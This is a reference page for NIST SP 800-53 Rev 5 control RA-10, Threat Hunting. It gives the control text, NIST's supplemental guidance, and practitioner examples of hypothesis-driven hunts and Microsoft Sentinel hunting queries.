NIST 800-53 REV 5 • RISK ASSESSMENT
RA-10 — Threat Hunting
Establish and maintain a cyber threat hunting capability to: Search for indicators of compromise in organizational systems; and Detect, track, and disrupt threats that evade existing controls; and Employ the threat hunting capability {{ insert: param, ra-10_odp }}.
Supplemental Guidance
Threat hunting is an active means of cyber defense in contrast to traditional protection measures, such as firewalls, intrusion detection and prevention systems, quarantining malicious code in sandboxes, and Security Information and Event Management technologies and systems. Cyber threat hunting involves proactively searching organizational systems, networks, and infrastructure for advanced threats. The objective is to track and disrupt cyber adversaries as early as possible in the attack sequence and to measurably improve the speed and accuracy of organizational responses. Indications of compromise include unusual network traffic, unusual file changes, and the presence of malicious code. Threat hunting teams leverage existing threat intelligence and may create new threat intelligence, which is shared with peer organizations, Information Sharing and Analysis Organizations (ISAO), Information Sharing and Analysis Centers (ISAC), and relevant government departments and agencies.
Practitioner Notes
Threat hunting is the proactive search for adversaries already inside your network who have evaded your automated defenses. Instead of waiting for alerts, hunters actively look for signs of compromise.
Example 1: Schedule monthly threat hunting exercises where your security team develops hypotheses based on recent threat intelligence (e.g., 'APT group X uses PowerShell for lateral movement — let us look for unusual PowerShell activity on our servers') and searches your log data for evidence.
Example 2: In Microsoft Sentinel, use the Hunting workspace and built-in hunting queries aligned to MITRE ATT&CK techniques. Run queries for living-off-the-land techniques, unusual authentication patterns, and data staging. Document each hunt with the hypothesis, data sources searched, findings, and recommended actions.